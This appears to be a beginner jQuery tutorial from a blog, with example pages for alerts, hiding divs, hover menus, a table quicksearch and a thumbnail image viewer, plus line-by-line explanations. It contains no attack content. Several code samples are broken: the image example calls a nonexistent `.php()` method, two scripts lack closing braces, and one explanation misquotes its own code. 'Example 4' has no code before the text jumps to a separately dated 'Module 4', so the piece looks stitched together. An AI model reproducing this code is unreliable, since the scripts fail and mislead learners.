$(’p[title="Hi!!!"]‘):- This option will select from the page all < p> tags that have a title of “Hi!!!”. Techniques like this enable the use of much more semantically correct (X)HTML markup, while still facilitating the DOM scripting required to create complex interactions.

$(’p[title^="K"]‘):- This enables the selection of all of the < p> tags on the page that have a title that starts with the letter K.

Steps for installing and running a jquery-

So Now you are familier with jQuery, in this section you can lern the steps of processing the jquery , we will download and install jquery for developing our demo application, and on following the steps you can be run the jquery example shortly.

Step 1: Download jQueryv1.3:

you can download the jquery form jquery.com site.

Step 2: After downloading the jQuery,extect the files with in the same folder add it into your web application.You can rename the folder if you want (Its optional).

Basic Stucture: The basic structure of the jquery is as follows, on following this structuren you can run your jQuery script.

< html>
< head>
< script type="text/JavaScript " src="jquery.js">< /script>
< script type="text/JavaScript ">
// Your JavaScript code
< /script>
< /head>
< body>
< !-- Your HTML content -->
< /body>
< /html>

Note*: Make sure that the path(src= “jquery.js”) given buy you is correct and your jquery is in the right folder.

Examples and explanation:

First Example (JavaScript alert): Now we can move to our first example, we follow the basic structure explained above; every thing in the above structure should be cleared to you.

Example description: Let us take an example of the simple alert on click the link. In this example we have to display a pop up window on clicking a link.

Php Page Name: alert.php

< html>
< head>
1. < script type="text/JavaScript " src=" jQuery/jquery.js">< /script>
2. < script type="text/JavaScript ">
3. $(document).ready(function() {
4. $("a").click(function() {
5. alert ("Welcome to jQuery!");
6. });
7.});
< /script>
< /head>

Exaplanation: This is a simple and the first example of displaying the alert onclicking over the links.

Let us we explain the code writing above for this example, the line by line it can be explained to you, we do not consider the html tags as a line we only gives the explanation of script, not the HTML tags.

Line 1: Including the supporting jquery files in the script.

Line2: < script type="text/JavaScript "> It simply tells that JavaScript code are written here.

Line3: $(document).ready(function() { -

This is the main function from where all the event (Function) are handled.

We have explained this function above if you want to know more about this function, kindly see the above section. Basically working of the function is start as soon as the DOM is loaded and and before the page contents are loaded.

Line4: $("a").click(function() { - A important point of the jquery is the selector, the selection of appropriate selector makes your work more effective.

The line 4 have a selector $(“a”) which is called on a ‘click’ function, the $(a) is a selector, it basically calls all the anchor tags (links) used in the script. It selects all the elements, and $ it self a is an alias for the jquery class, $() construct a new juery object.

So that’s why we here give the example of two links, both having two anchor tag and both calls the same function on click.

Line 5: alert ("Welcome to jQuery alert!"); - This is a JavaScript arert for displaying the alert in the alert window.

Line6 & 7:- brases closed.

Line 8 & 9:- It is the HTML Code for Display Links.

Second Example (delete content):

In the second example, we take an example of removing a div, containing paragraph, there are several paragraphs are displayed here and on clicking the cross image placed on each paragraph it disappears.

Php Page Name: hideDiv.php

< !DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
< html xmlns="http://www.w3.org/1999/xhtml">
< head>
< meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
< title>Div Disappear< /title>

1.< script type="text/JavaScript " src=" jQuery/jquery.js">< /script>

2.< script type="text/JavaScript ">
3.$(document).ready(function(){
4.$(".divClass .deleteDiv").click(function(){
5.$(this).parents(".divClass").animate({ opacity: 'hide' }, "slow");
});

});
< /script>

6.< style type="text/css">
body {
margin: 10px auto;
width: 470px;
}
h3 {
margin: 0;
padding: 0 0 .10em;
}
p {
margin: 0;
padding: 0 0 .10em;
}
.divClass {
background: #339999;
padding: 10px 10px 10px;
position: relative;
border-top: solid 2px #003300;
}
.divClass .deleteDiv {
position: absolute;
top: 5px;
right: 5px;
cursor: pointer;
}
7.< /style>
< /head>
< body>
8.< div class="divClass">
9.< h3>First Div< /h3>
10.< p>This is the content place for div no.1< /p>
11.< img src="images/del.gif" alt="delete" class="deleteDiv" />
12.< /div>

< div class="divClass">
< h3>Second Div< /h3>
< p>This is the content place for div no. 2< /p>
< img src="images/del.gif" alt="delete" class="deleteDiv" />
< /div>
< div class="divClass">
< h3>Third Div 3< /h3>
< p>This is the content place for div no. 3< /p>
< img src="images/del.gif" alt="delete" class="deleteDiv" />
< /div>
< div class="divClass">
< h3>Fourth Div 2< /h3>
< p>This is the content place for div no. 4< /p>
< img src="images/del.gif" alt="delete" class="deleteDiv" />
< /div>
< /body>
< /html>

Exapmle Explained: As you can see the code above, the code contains no new thing to explened, so only the core part of the example is explained here, I thing there is no need to to explain each and every thing.

Line1: .< script type="text/JavaScript " src="jquery.js">< /script> - Including the jQuery file.

Line2: .< script type="text/JavaScript "> - JavaScript starts for here

Line 3: $(document).ready(function(){ - event handler function (Explained above).

Line 4: $(".divClass .deleteDiv").click(function(){ - This function is works on calling ckick event applied on both the divs.(one is parent and the another is child).

Line 5: $(this).parents(".divClass").animate({ opacity: 'hide' }, "slow"); - This parent function is works for the parent function (.divClass) the function have two parameter one is for the visibility and the other is for the effects. The function tells about the div is hide the div and the process for hiding is slow.

Line 6- 7: < style type="text/css"> …< /style>- CSS is applied in the line.

Line 8: < div class="divClass"> - This is the div used as a parent element.

Line 9: < h3>First Div< /h3>- html heading tag.

Line 10: < p>This is the content place for div no.1< /p> - html parameter tag.

Line 11: < img src="images/del.gif" alt="delete" class="deleteDiv" />- This is for the image is used in the div.

Line 12: < /div> - Div is closed.

Example 3(Slide up Contents): This is a very simple example, in this example the contents are present in many divs burt resembles us to be present in different lines, and on clicking the content line the line goes disappears.(Actually the div of that line will be disappear on clicking the text.).

Php Page Name: clickon.php.

< !DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
< html>
< head>
< script src="jQuery/jquery.js">< /script>

< script>
1. $(document).ready(function(){
2. $("p").click(function () {
3. $(this).slideUp();
});
4. $("p").hover(function () {
5. $(this).addClass("hilite");
6. }, function () {
7. $(this).removeClass("hilite");
});

});
< /script>
< style>
p { color:green; margin:13px; cursor:pointer; }
p.hilite { background:orange; }
< /style>
< /head>
< body>
8. < p>Click on this text message to disappear< /p>
9. < p>This is the second text message which is disappear on click< /p>
10. < p>This is the third text message which is disappear on click< /p>
11. < p>This is the Fourth text message which is disappear on click< /p>
< /body>
< /html>

Explanation: If you understand the above two example then this example could not create much complication to understand. So below only kew points are consider for discussion.

Line1: $(document).ready(function(){ - event handler function (Explained above).

Line2: $("p").click(function () – click function calls on p selector

Line3: $(this).slideUp(); - A jQuery function

Line4: $("p").hover(function () {- hover function calls on the p selector.

Line5: $(this).addClass("hilite"); - Adding a C.S.S class hillite.

Line6: function () {

Line 7: $(this).removeClass("hilite");- Removing a C.S.S class hillite. When calls the function.

Line 8-11: < p>Click on this text message to disappear< /p> - HTML Paragraph tag containing the text messages..

Example 4(Hide-Show content): This is an example to hide/show the div containing text, the basic work of the example is, there are list of divs(containing the headings. ex- index) when you click on the div. it will expand and show the content inside the div.And onclicking it again it will hide the contents. This is a good exmple for applying on the List.

Php Page name: showHideDiv.php

Module 4: Advance JQuery

2017-07-28T13:57:00.000+05:30

Module 4: Advance JQuery:

Now in this section we will explain you the example and the code explanation about the jquery, in this section we will try to give some advance jquery examples, like jquery with database, jquery with ajax and etc.

Example 1: Heading Hover: This is the Example of the Heading hover which gives an information on mousehover the heading (image). In this examples there are three headings, each heading having some information and on mousehover of each heading show the related information of the headings.

Php Page Name: headingHover.php

< !DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"

"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

< html xmlns="http://www.w3.org/1999/xhtml">

< head>

< meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

< title>Animated Menu Hover 1< /title>

< script type="text/JavaScript " src="jQuery/jquery.js">< /script>

< script type="text/JavaScript ">

$(document).ready(function(){

1. $(".menu a").hover(function() {

2. $(this).next("em").animate({opacity: "show", top: "-75"}, "slow");

3. }, function() {

4. $(this).next("em").animate({opacity: "hide", top: "-85"}, "fast");

});

< /script>

5. < style type="text/css">

body {

margin: 10px auto;

width: 570px;

font: 75%/120% Arial, Helvetica, sans-serif;

}

.menu {

margin: 100px 0 0;

padding: 0;

list-style: none;

}

.menu li {

padding: 0;

margin: 0 2px;

float: left;

position: relative;

text-align: center;

}

.menu a {

padding: 14px 10px;

display: block;

color: #000000;

width: 144px;

text-decoration: none;

font-weight: bold;

background: url(images/button.gif) no-repeat center center;

}

.menu li em {

background: url(images/hover.png) no-repeat;

width: 180px;

height: 45px;

position: absolute;

top: -85px;

left: -15px;

text-align: center;

padding: 20px 12px 10px;

font-style: normal;

z-index: 2;

display: none;

}

6. < /style>

< /head>

< body>

7.< ul class="menu">

< li>

< a href="http://www.techumor.com">Heading1< /a>

< em>This contains some information about the Heading1< /em>

< /li>

< li>

< a href="http://www.techumor.com">Heading2< /a>

< em>This contains some information about the Heading2< /em>

< /li>

< li>

< a href="http://www.techumor.com">Heading3< /a>

< em>This contains some information about the Heading3< /em>

< /li>

8.< /ul>

< /body>

< /html>

Explanation: In the above example, script uses some code which is described below.

1. $(".menu a").hover(function() { // This is the hover function which acts on mousehover .

2. (this).next("em").animate({opacity: "show", top: "-75"}, "slow"); // animate is an another function having which works on mousehover , it have some argument which defines the appearance and the position of the animated block.

3. }, function() {

4. $(this).next("em").animate({opacity: "hide", top: "-85"}, "fast"); // same as above but acts for hide headings. }); });

Example 2 (Searching Text) Php Page Name: jquery_search.php:

< !DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"

"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

< html xmlns="http://www.w3.org/1999/xhtml">

< head>

< meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

< title>test< /title>

< script type="text/JavaScript " language=

"JavaScript " src="jQuery/jquery.js">< /script>

< script type="text/JavaScript " language=

"JavaScript " src="jQuery/jquery.quicksearch.js">< /script>

< script type="text/JavaScript " charset="utf-8">

$(document).ready(function () {

$('table#searchoption tbody tr').quicksearch({

stripeRowClass: ['odd', 'even'],

position: 'before',

attached: '#searchoption',

labelText: 'Search ',

loaderImg: 'images/loading.gif'

});

$('#checkAllAuto').click( function(){ $("INPUT[type='checkbox']").

attr('checked', $('#checkAllAuto').is(':checked')); } )

});

< /script>

< /head>

< body>

< form name="frm" action="" method="post">

< table border="0" id="searchoption" align="left"

width="400" cellpadding="2" cellspacing="2">

< tr>

< td> < /td>

< /tr>

< tr>

< td>

< table border="1" cellpadding="0" cellspacing="0" width="50%">

< tr>

< td>kamal< /td>

< /tr>

< tr>

< td>Aman< /td>

< /tr>

< tr>

< td>Tarun< /td>

< /tr>

< tr>

< td>Dhirendra < /td>

< /tr>

< /table>

< /td>

< /tr>

< /table>

< /form>

< /body>

< /html>

Searching text is a good example for helping in searching of the name, address, and other details pf a user with simple typing the text which you want to be search.

If you have some text or data in the database or hard coded the text, there is a text box called search box which search your text enter in the search box.

Code explanation: 2 files are included in the script, one of them have the search script, called jquery. Quick search is (and one is jquery, js the normal jquery file ). This file having the jquery search concept so this is better to include this file before using the jquery search script.

$(document).ready(function () {

$('table#searchoption tbody tr').quicksearch({

stripeRowClass: ['odd', 'even'],

position: 'before',

attached: '#searchoption',

labelText: 'Search ',

loaderImg: 'images/loading.gif'

});

$('#checkAllAuto').click( function(){ $("INPUT[type='checkbox']").

attr('checked', $('#checkAllAuto').is(':checked')); } )

});

The above script uses in the search example, this is the script for the search option. If you can see the hml part, it have an option “id= search option” in the table. Which is for applying the serch script on the table data?/td>

Example3 (mages Magnifier)

Php Page Name: clickImages.php

< !DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//

EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

< html xmlns="http://www.w3.org/1999/xhtml">

< head>

< meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

< title>Image Changing< /title>

< script type="text/JavaScript " src="jQuery/jquery.js">< /script>

< script type="text/JavaScript ">

$(document).ready(function(){

$("h2").append('< em>< /em>')

$(".thumbs a").click(function(){

var largePath = $(this).attr("href");

var largeAlt = $(this).attr("title");

$("#largeImg").attr({ src: largePath, alt: largeAlt });

$("h2 em").php(" (" + largeAlt + ")"); return false;

});

< /script>

< style type="text/css">

body {

margin: 20px auto;

padding: 0;

width: 580px;

font: 75%/120% Arial, Helvetica, sans-serif;

}

h2 {

font: bold 190%/100% Arial, Helvetica, sans-serif;

margin: 0 0 .2em;

}

h2 em {

font: normal 80%/100% Arial, Helvetica, sans-serif;

color: #999999;

}

#largeImg {

border: solid 1px #ccc;

width: 550px;

height: 400px;

padding: 5px;

}

.thumbs img {

border: solid 1px #ccc;

width: 100px;

height: 100px;

padding: 4px;

}

.thumbs img:hover {

border-color: #FF9900;

}

< /style>

< /head>

< body>

< h2>Illustrations< /h2>

< p>< img id="largeImg" src="images/img6.jpg" alt="Large image" />< /p>

< p class="thumbs">

< a href="images/img1.jpg" title="Image 2">< img src="images/img1-thumb.jpg" />< /a>

< a href="images/img2.jpg" title="Image 3">< img src="images/img2-thumb.jpg" />< /a>

< a href="images/img3.jpg" title="Image 5">< img src="images/img3-thumb.jpg" />< /a>

< a href="images/img4.jpg" title="Image 6">< img src="images/img4-thumb.jpg" />< /a>

< a href="images/img5.jpg" title="Image 6">< img src="images/img5-thumb.jpg" />< /a>

< /p>

< /body>

< /html>

Explanation: This is an example of the image display from thumbnail to large form on sim[ple click to the thumbnails, a user seens many thumbnails when he clicks on the thumb nail the large form of that picture will be appear and while on click on the other image the next pics, is appears.